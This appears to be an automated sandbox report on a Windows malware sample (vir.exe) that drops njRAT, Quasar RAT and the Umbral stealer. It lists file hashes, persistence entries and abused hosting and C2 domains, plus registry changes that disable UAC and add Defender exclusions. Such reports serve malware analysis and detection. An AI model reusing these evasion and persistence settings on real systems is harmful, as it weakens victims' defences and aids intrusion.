MD5 d6bd210f227442b3362493d046cea233
SHA1 ff286ac8370fc655aea0ef35e9cf0bfcb6d698de
SHA256 335a256d4779ec5dcf283d007fb56fd8211bbcaf47dcd70fe60ded6a112744ef
SHA512 464aaab9e08de610ad34b97d4076e92dc04c2cdc6669f60bfc50f0f9ce5d71c31b8943bd84cee1a04fb9ab5bbed3442bd41d9cb21a0dd170ea97c463e1ce2b5b

C:\Program Files (x86)\DroidCam\lib\install.bat

MD5 cfaaa32cc4fd40e36512f768bd75a0e1
SHA1 6ed1063ab547f65aace2fd98713df6d29834c19a
SHA256 d7b86a37b02fed2794904cb28c0fa64a1e0d2218fab608250c8531c1b9ddc439
SHA512 d2fe74d8e10b6378c48b72c9e22515a31592859d1f725bc86d9e48fcce9f7421e7afe477feb1c2041ff46b2620ad4244c887c670dc25e8acd70029e2166a0a93

memory/3052-4850-0x0000000002A00000-0x0000000002A0C000-memory.dmp

C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp

MD5 f6e94e3d7d3fe771b1933e06b7ba79b5
SHA1 65da1b5ab85f7b60f88c92101fdf95bfc7fe3931
SHA256 2a6124f7df464a02fc560cdf982eb3a65793e0c9252b361ec1e386bf4f63b60c
SHA512 45cc73010f8b3b638ce7349179a1a603ec009d0ce1066beafa03cc85c3a5a055c6430e50b9e298411d8dd617b698fd49364f8491ac95768a0a91c01c9e4390d4

C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp

MD5 aed4aa73848bd3423c170bf58f8febfa
SHA1 dfac68f7df29410357c00effee42e40bd0491167
SHA256 1cd87356a573e9def505dc8cc5e9f682e3cceecf499f50007b85def3c842b630
SHA512 4a9900d422447c59342c88e164d81c4187743e63eb5f993800311397bbdf43bea90e456b720fcd3e679bf029be70220e0b89c60d2717bf278d76c1049d921bfa

C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp

MD5 65f3e2bdb187ef73ce65b92c770594dd
SHA1 514f571ed0f89e50b53909e3f9550cad6107ceea
SHA256 13d6fb4d2284ec6b138740aaef4c7f6ac82e78d59891f4e51c8656f05150db8e
SHA512 2b5def159bd09b20cbcd03de3d2973c1fd216b35de71006c3077aeeddb71165075545941ebd53807fdd5cf682ec3eaadaeab9504b55a85c895cc1b811cf1a0c0

C:\Windows\Temp\CabD0D8.tmp

MD5 d59a6b36c5a94916241a3ead50222b6f
SHA1 e274e9486d318c383bc4b9812844ba56f0cff3c6
SHA256 a38d01d3f024e626d579cf052ac3bd4260bb00c34bc6085977a5f4135ab09b53
SHA512 17012307955fef045e7c13bf0613bd40df27c29778ba6572640b76c18d379e02dc478e855c9276737363d0ad09b9a94f2adaa85da9c77ebb3c2d427aa68e2489

C:\Windows\Temp\TarD0EB.tmp

MD5 b13f51572f55a2d31ed9f266d581e9ea
SHA1 7eef3111b878e159e520f34410ad87adecf0ca92
SHA256 725980edc240c928bec5a5f743fdabeee1692144da7091cf836dc7d0997cef15
SHA512 f437202723b2817f2fef64b53d4eb67f782bdc61884c0c1890b46deca7ca63313ee2ad093428481f94edfcecd9c77da6e72b604998f7d551af959dbd6915809c

memory/2428-4912-0x0000000000FC0000-0x00000000012E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Kzc7NpqR3EAQ.bat

C:\Program Files (x86)\DroidCam\DroidCamApp.exe

C:\Program Files (x86)\DroidCam\Uninstall.exe

C:\Users\Admin\AppData\Local\Temp\nsy5699.tmp\System.dll

C:\Users\Admin\AppData\Local\Temp\nsy5699.tmp\nsExec.dll

C:\Users\Admin\AppData\Local\Temp\nsy5699.tmp\nsDialogs.dll

memory/3140-5039-0x00000000002F0000-0x0000000000614000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xMpCKpeM4s9U.bat

memory/3292-5317-0x0000000000ED0000-0x00000000011F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\exkVVvci5sM8.bat

memory/992-5433-0x0000000000110000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SotQmsnK8LSD.bat

memory/480-5605-0x00000000056D0000-0x0000000005B0E000-memory.dmp

memory/480-5608-0x00000000056D0000-0x0000000005B0E000-memory.dmp

memory/3052-5607-0x0000000000400000-0x000000000083E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\freebobux.bat

memory/2872-5622-0x0000000000160000-0x00000000001AA000-memory.dmp

memory/2872-5623-0x0000000000290000-0x00000000002B4000-memory.dmp

memory/3332-5640-0x00000000012A0000-0x00000000012E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\load.cmd

memory/3112-5650-0x0000000000970000-0x000000000097A000-memory.dmp

memory/848-5787-0x0000000000320000-0x0000000000644000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zIF5T2gxy810.bat

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

memory/3052-5921-0x0000000000400000-0x000000000083E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe

memory/480-5964-0x00000000056D0000-0x0000000005B0E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\DOMStore\5ENOHPAD\www.youtube[1].xml

memory/3336-6009-0x0000000000A50000-0x0000000000D74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QmdQV8raYufy.bat

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\favicon[1].ico

memory/1540-6139-0x00000000012F0000-0x0000000001614000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ORLHVJxSJiqt.bat

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\4Kv5U5b1o3f[1].png

memory/912-6255-0x0000000000040000-0x0000000000364000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jD0d0HUugteK.bat

C:\Users\Admin\AppData\Local\Temp\EZyhRilaxK4P.bat

C:\Users\Admin\AppData\Local\Temp\TtFOjjU5RTQ3.bat

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 09:16

Reported

2024-11-08 09:21

Platform

win10v2004-20241007-en

Max time kernel

152s

Max time network

166s

Command Line

"C:\Users\Admin\AppData\Local\Temp\vir.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Umbral

stealer umbral

Umbral family

umbral

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

njRAT/Bladabindi

trojan njrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\1CCF8823482A12F66BA7C629093B98DF77300697\Blob = 0f000000010000001400000067b3a708f1576af8c76f850d49fa5b878ffe45310200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000620035003500380035003200380035002d0033003600370063002d0034006100640061002d0061006100330034002d0065006500380033003100630063003800350063003800320000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000300000001000000140000001ccf8823482a12f66ba7c629093b98df77300697200000000100000000030000308202fc308201e4a00302010202104a3bf5362cc6dd834d64c59090733aa6300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313130383039313931375a180f32313234313031353039313931375a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dc52dc355f446ca60a7a9674bd866624422fcd4c120bd1e64155d3853c71d0ec5e3f22e9712e297eea95dec6c30548a420b41f4abe40c3613358f28f5100976d1fa19ccb39dfc708cfb52bf32ce934054f77c28d4d987b34f42af4b8cca59b678585616fd85c36f581bfe79da39d1b9cfdc270fada2e36caf60759b6773445998f78502d375686c673a079c1a5087bcfcaa68df4a6151c031e6b69a19c32ef2048a6943808713297fb82fc01fb662feb31e86afe2c57678baaa513ac573626f01602df40e01aa6014c3b2de7c21fca1ab8634a2742473e4d8153485e018cb5c7a4f06dacd5acb90d18e7bace4ec28d2f96ae1bfa4bc49515c8ca159f6602fb710203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e404b424b574745424b0030090603551d1304023000300d06092a864886f70d0101050500038201010092aba6879b3d92d2d30dd09ab1b7db00532b6f7cbb2202d2a54c53b4475a1dafe10549722049f7838664bd7289bfd04dff25db8bb7e1cf41f7d06816d63cfbc49c665fdd82032a1a7b5587e655571788279445dd9ab9f7d41c5e8e457305b0922e6325002
ff63f3fc7c6cba72d81edc18c24b8fab93bedcea73aebc4104ed67a755ef6545aed1d68b971036daa12416ac56dbe2ce608af284fc8a2727dbec248a7cca31648fd9ad8981822bf1364ee139db9dbf3cd5dbb6056d4e995307549a527a26f0b7d305cb9a4ff4d345d3468f6985da3adf6b004adafe743230a7f61e58cbc95586069ae2497d64b89da247cc0814b2d4c2b890e2f761c40cc1a74cf73 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Program Files\SubDir\Romilyaa.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rj4PrEgwxfGsAttY0T428Muw.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Google.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\the.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wimloader.dll N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\ac3.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\freebobux.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\SolaraBootstraper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\wim.dll N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\CLWCP.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Password Policy Discovery

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" C:\Users\Admin\AppData\Local\Temp\3DF9.tmp\CLWCP.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 6924 set thread context of 6700 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Winaero Tweaker\is-F40AI.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-I6BPG.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-G688I.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-NAHLU.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\SubDir\Romilyaa.exe C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-4SF88.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-COUAC.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-MK150.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-8KKUE.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-NO9VC.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\SubDir\Romilyaa.exe C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\scary.exe N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File created C:\Program Files\Winaero Tweaker\is-D66JH.tmp C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\regmess.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\notepad.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ipconfig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
